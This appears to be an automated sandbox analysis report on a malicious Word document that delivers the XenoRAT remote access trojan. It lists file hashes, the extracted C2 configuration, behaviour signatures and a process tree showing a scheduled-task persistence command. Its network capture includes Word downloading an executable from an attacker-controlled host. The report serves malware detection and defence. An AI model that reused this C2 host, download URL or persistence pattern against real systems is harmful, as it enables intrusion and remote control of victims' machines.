Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    09-12-2024 05:41

General

  • Target

    7ea9da3dd3db6f3fadf04ac76b54434b.doc

  • Size

    195KB

  • MD5

    7ea9da3dd3db6f3fadf04ac76b54434b

  • SHA1

    b30b950191046d999e71aaa54fb2648c6655ce9b

  • SHA256

    947bce97211371e730a2b8b79c2ec4d154904e8faa7bed2583c5c6c420230170

  • SHA512

    f94eb382dedb8c3952dbc0f3b9040201455cec641c845bedf5765a2772aa98cb20d92b3e0edadcd92fd7cdb77e7c6f37d26bdd276cceea733237e28f04240f9d

  • SSDEEP

    3072:a877VGZ5Sd3b4e0wNZtsqXNKd5AvDJW4S+I/tZ6X1bpF6mfTm:DGZYwAZHMCDJ8/u5pAmbm

Malware Config

Extracted

Family

xenorat

C2

dns.stipamana.com

Mutex

Xeno_rat_nd8912d

Attributes
  • delay

    12000

  • install_path

    appdata

  • port

    4567

  • startup_name

    mrec

Signatures

  • Detect XenoRat Payload 1 IoCs
  • XenorRat

    XenoRat is a remote access trojan written in C#.

  • Xenorat family
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ea9da3dd3db6f3fadf04ac76b54434b.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:5076
    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4400
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
          "C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            5⤵
            • Executes dropped EXE
            PID:4456
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4456 -s 80
              6⤵
              • Program crash
              PID:3252
          • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3928
          • C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            C:\Users\Admin\AppData\Roaming\UpdateManager\GFKMTE.exe
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:632
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3312
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\Admin\AppData\Local\Temp\tmpAA59.tmp" /F
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2168
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4456 -ip 4456
    1⤵
      PID:5032

Network

    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      134.130.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      134.130.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      roaming.officeapps.live.com
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      roaming.officeapps.live.com
      IN A
      Response
      roaming.officeapps.live.com
      IN CNAME
      prod.roaming1.live.com.akadns.net
      prod.roaming1.live.com.akadns.net
      IN CNAME
      eur.roaming1.live.com.akadns.net
      eur.roaming1.live.com.akadns.net
      IN CNAME
      weu-azsc-000.roaming.officeapps.live.com
      weu-azsc-000.roaming.officeapps.live.com
      IN CNAME
      osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
      osiprod-weu-buff-azsc-000.westeurope.cloudapp.azure.com
      IN A
      52.109.89.19
    • flag-nl
      POST
      https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
      WINWORD.EXE
      Remote address:
      52.109.89.19:443
      Request
      POST /rs/RoamingSoapService.svc HTTP/1.1
      Cache-Control: no-cache
      Connection: Keep-Alive
      Pragma: no-cache
      Content-Type: text/xml; charset=utf-8
      User-Agent: MS-WebServices/1.0
      SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
      Content-Length: 511
      Host: roaming.officeapps.live.com
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Type: text/xml; charset=utf-8
      Server: Microsoft-IIS/10.0
      X-OfficeFE: RoamingFE_IN_126
      X-OfficeVersion: 16.0.18315.30575
      X-OfficeCluster: weu-000.roaming.officeapps.live.com
      Content-Security-Policy-Report-Only: script-src 'nonce-YATij8Nrs8K5byVybn+d7KdBtjcvv9dwlhXz6CPZvKmbNHgslxKADKTYSaNi4sBfpkid4sYqNQaVyvYJ1YAKQr9cmL1G2xtpJM+Buidspty0DGxtkjxsa7LRD8laDoxqWjPq2/dOM34VJoGeUFoyPsqg4zK+vsYZSsw/THr8TTc=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
      X-CorrelationId: b7930b3d-3646-4d03-ba89-e6855293b8ba
      X-Powered-By: ASP.NET
      Date: Mon, 09 Dec 2024 05:41:09 GMT
      Content-Length: 654
    • flag-us
      DNS
      www.stipamana.com
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      www.stipamana.com
      IN A
      Response
      www.stipamana.com
      IN A
      94.156.167.57
    • flag-bg
      GET
      https://www.stipamana.com/yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe
      WINWORD.EXE
      Remote address:
      94.156.167.57:443
      Request
      GET /yuerthreytwsytysrertersedtryerytsrt/erwgsergtseggszgdargaregwa/strsrthtghtghdfghsgthw/cfdhxdzhtfxgh.exe HTTP/1.1
      Accept: */*
      Accept-Language: en-us
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: www.stipamana.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Mon, 09 Dec 2024 05:41:10 GMT
      Content-Type: application/octet-stream
      Content-Length: 177664
      Last-Modified: Mon, 09 Dec 2024 04:36:17 GMT
      Connection: keep-alive
      Keep-Alive: timeout=60
      ETag: "675673c1-2b600"
      Expires: Thu, 31 Dec 2037 23:55:55 GMT
      Cache-Control: max-age=315360000
      Accept-Ranges: bytes
    • flag-us
      DNS
      r10.o.lencr.org
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      r10.o.lencr.org
      IN A
      Response
      r10.o.lencr.org
      IN CNAME
      o.lencr.edgesuite.net
      o.lencr.edgesuite.net
      IN CNAME
      a1887.dscq.akamai.net
      a1887.dscq.akamai.net
      IN A
      88.221.134.115
      a1887.dscq.akamai.net
      IN A
      88.221.134.137
      a1887.dscq.akamai.net
      IN A
      88.221.135.106
      a1887.dscq.akamai.net
      IN A
      88.221.135.115
      a1887.dscq.akamai.net
      IN A
      88.221.134.89
      a1887.dscq.akamai.net
      IN A
      88.221.135.107
      a1887.dscq.akamai.net
      IN A
      88.221.134.107
      a1887.dscq.akamai.net
      IN A
      88.221.135.105
      a1887.dscq.akamai.net
      IN A
      88.221.134.91
    • flag-gb
      GET
      http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D
      WINWORD.EXE
      Remote address:
      88.221.134.115:80
      Request
      GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgP9IoBvxPBYG5AD8lLDTzup%2FQ%3D%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: r10.o.lencr.org
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: application/ocsp-response
      Content-Length: 504
      ETag: "059D3BAE63C5A1873B0BF25DA52972542479B7F2C65A77BEA577C58029A90F01"
      Last-Modified: Mon, 09 Dec 2024 03:41:00 UTC
      Cache-Control: public, no-transform, must-revalidate, max-age=21593
      Expires: Mon, 09 Dec 2024 11:41:03 GMT
      Date: Mon, 09 Dec 2024 05:41:10 GMT
      Connection: keep-alive
    • flag-us
      DNS
      18.89.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.89.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      30.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      30.243.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      19.89.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      19.89.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      76.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      76.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      57.167.156.94.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      57.167.156.94.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      168.245.100.95.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      168.245.100.95.in-addr.arpa
      IN PTR
      Response
      168.245.100.95.in-addr.arpa
      IN PTR
      a95-100-245-168.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      115.134.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      115.134.221.88.in-addr.arpa
      IN PTR
      Response
      115.134.221.88.in-addr.arpa
      IN PTR
      a88-221-134-115.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      217.106.137.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      217.106.137.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      17.173.189.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      17.173.189.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      metadata.templates.cdn.office.net
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      metadata.templates.cdn.office.net
      IN A
      Response
      metadata.templates.cdn.office.net
      IN CNAME
      templatesmetadata.office.net
      templatesmetadata.office.net
      IN CNAME
      templatesmetadata.office.net.edgekey.net
      templatesmetadata.office.net.edgekey.net
      IN CNAME
      e26769.dscb.akamaiedge.net
      e26769.dscb.akamaiedge.net
      IN A
      92.123.26.217
      e26769.dscb.akamaiedge.net
      IN A
      92.123.26.202
    • flag-gb
      GET
      https://metadata.templates.cdn.office.net/client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C
      WINWORD.EXE
      Remote address:
      92.123.26.217:443
      Request
      GET /client/templates/gallery?lcid=1033&syslcid=1033&uilcid=1033&app=0&ver=16&tl=2&build=16.0.12527&gtype=0%2C1%2C2%2C5%2C HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: metadata.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Type: text/xml
      Server: Kestrel
      Content-Encoding: gzip
      Content-Length: 1264
      Cache-Control: max-age=253461
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Vary: Accept-Encoding
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      binaries.templates.cdn.office.net
      WINWORD.EXE
      Remote address:
      8.8.8.8:53
      Request
      binaries.templates.cdn.office.net
      IN A
      Response
      binaries.templates.cdn.office.net
      IN CNAME
      binaries.templates.cdn.office.net.edgesuite.net
      binaries.templates.cdn.office.net.edgesuite.net
      IN CNAME
      a1847.dscg2.akamai.net
      a1847.dscg2.akamai.net
      IN A
      2.19.252.136
      a1847.dscg2.akamai.net
      IN A
      2.19.252.143
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03328893.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03328893.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 20235
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 48ZBc7L0qnq3LhOWqVFL2A==
      Last-Modified: Fri, 22 Apr 2016 16:10:17 GMT
      ETag: 0x8D36AC898C9059A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7e7953a4-301e-000c-4e28-bf1d22000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751501.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345751501.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 222992
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: Jr6rnM6v5Pvwt8A2JoGp0g==
      Last-Modified: Wed, 29 Aug 2018 18:20:50 GMT
      ETag: 0x8D60DDC26100537
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 6efd7f9e-101e-00b2-2f97-a0755b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02835233.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02835233.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 46413
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: xFXEvEvsng2mfE0eU+RtWg==
      Last-Modified: Fri, 22 Apr 2016 16:09:25 GMT
      ETag: 0x8D36AC879BBB45C
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: bcca83ea-301e-000c-1015-b91d22000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0403392701.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0403392701.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 2527736
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 8laspQm0xsAUTSeMcDawqA==
      Last-Modified: Wed, 29 Aug 2018 18:18:47 GMT
      ETag: 0x8D60DDBDD02F94A
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0e86dec0-501e-00d1-55b9-b9e8a0000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp01840907.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp01840907.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 43653
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 2jOARYFw5gy+pyYC/dDZVQ==
      Last-Modified: Fri, 22 Apr 2016 16:08:15 GMT
      ETag: 0x8D36AC84F8E1FB0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: d47d4a02-201e-00a9-0e0f-ba4b58000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345750301.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345750301.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 640684
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: +TNk7sbE/6V2jeVFosNPBw==
      Last-Modified: Wed, 29 Aug 2018 18:15:13 GMT
      ETag: 0x8D60DDB5D624CF0
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 7adc3bba-701e-004d-4a96-8afe8b000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851216.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851216.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 34816
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: YoYxJM3NoTXswOcieCy4iA==
      Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
      ETag: 0x8D36AC8813CE0D3
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 4196af4e-901e-003f-4990-2d48e6000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp03998158.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp03998158.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 42788
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: IaS3txYxwszaX7umN1Hw0g==
      Last-Modified: Fri, 22 Apr 2016 16:11:18 GMT
      ETag: 0x8D36AC8BD065412
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 620287b7-401e-00f2-3213-ba7263000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp02851217.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp02851217.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 33610
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: UYBOJVxXMXYDn01bVcEqsg==
      Last-Modified: Fri, 22 Apr 2016 16:09:38 GMT
      ETag: 0x8D36AC881987151
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 0171b447-f01e-005b-359a-1db97e000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
      GET
      https://binaries.templates.cdn.office.net/support/templates/en-us/tp0345751001.cab
      WINWORD.EXE
      Remote address:
      2.19.252.136:443
      Request
      GET /support/templates/en-us/tp0345751001.cab HTTP/1.1
      Connection: Keep-Alive
      Accept-Encoding: gzip
      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12527; Pro)
      X-IDCRL_ACCEPTED: t
      X-Office-Version: 16.0.12527
      X-Office-Application: 0
      X-Office-Platform: Win32
      X-Office-AudienceGroup: Production
      X-Office-SessionId: A9BF320D-2634-45AA-861B-027D0A0FAA62
      Host: binaries.templates.cdn.office.net
      Response
      HTTP/1.1 200 OK
      Content-Length: 1065873
      Content-Type: application/vnd.ms-cab-compressed
      Content-MD5: 4RAcym4/7bKLV69MQbUNNw==
      Last-Modified: Wed, 29 Aug 2018 18:15:37 GMT
      ETag: 0x8D60DDB6BA6E455
      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
      x-ms-request-id: 9ae00d4d-001e-0028-7797-a0eb82000000
      x-ms-version: 2009-09-19
      x-ms-lease-status: unlocked
      x-ms-blob-type: BlockBlob
      Date: Mon, 09 Dec 2024 05:41:25 GMT
      Connection: keep-alive
      Access-Control-Allow-Headers: *
      Vary: Origin
      Access-Control-Allow-Credentials: true
      Access-Control-Allow-Methods: GET,POST,OPTIONS
      Access-Control-Allow-Origin: *
    • flag-gb
